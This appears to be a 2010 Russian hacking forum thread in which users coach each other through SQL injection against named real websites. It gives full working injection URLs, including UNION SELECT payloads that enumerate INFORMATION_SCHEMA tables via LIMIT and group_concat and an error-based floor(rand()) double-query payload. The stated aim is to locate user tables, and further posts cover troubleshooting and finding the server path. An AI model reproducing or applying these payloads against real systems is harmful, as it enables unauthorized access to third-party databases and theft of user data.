
16.05.2010, 13:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от geforce
http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/
везде подставляю version() и не чего не выводит? Почему?
а минус кто ставит будет?
-30+union+....
вторая Колонка <title></title>
|
|
|

16.05.2010, 13:16
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от Konqi
а минус кто ставит будет?
-30+union+....
вторая Колонка <title></title>
спасибо! 
|
|
|

16.05.2010, 14:37
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
CHARACTER_SETS имя таблицы?
Да, но в ней нет юзеров.
Делай так:
http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.TABLES +LIMIT+1,1 /**/
Потом: limit+2,1; limit+3,1 и т.д., пока не найдешь то что тебе нужно.
Или можно так:
http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,group_concat(TABLE_NAME),3,4,5,6 ,7,8,9,10,11,1 2,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.TABLES /**/
Не забываем про то, что функции group_concat по дефолту ограничение - 1024 символа на вывод.
Последний раз редактировалось Iceangel_; 16.05.2010 в 15:09..
|
|
|

16.05.2010, 14:44
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2CyberHunter, group_concat
и выводит не все таблицы, а сколько позволит ограничение вывода
|
|
|

16.05.2010, 15:24
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
А это скула?
http://www.modvlad.ru/gallery/list.php?imagelib_cid=www
|
|
|

16.05.2010, 15:43
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2geforce, с чего ты взял? Скуллы не вижу, либо мой браузер неверно отображает пагу (со смарта)
Последний раз редактировалось Bb0y; 16.05.2010 в 15:48..
|
|
|

16.05.2010, 17:42
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
собственно вопрос: можно как нибудь узнать полный путь к сайту если вывод ошибок отключен?
|
|
|

16.05.2010, 17:48
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
http://www.rokk.ru/index.php?cat=50&item=-21%20or%20(select%20count(*)from(select%201%20unio n%20select%202%20union%20select%203)x%20group%20by %20concat(mid((select%20table_name%20from%20inform ation_schema.tables%20limit%2019,1),1,20),floor(ra nd(0)*2)))
SESSION_STATUS1
тут что такое 1 ??
как убрать ?
|
|
|

16.05.2010, 17:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
SESSION_STATUS1
тут что такое 1 ??
как убрать ?
Зачем убирать? Просто не учитывать. А появляется из-за floor(rand(0)*2)
поставь floor(rand(0)*100) - будут другие циферьки
|
|
|

16.05.2010, 18:01
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
floor(rand(0)*100)>>Query error: Subquery returns more than 1 row
prosto xo4u imeno 1 ubrat ??
a kak ?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|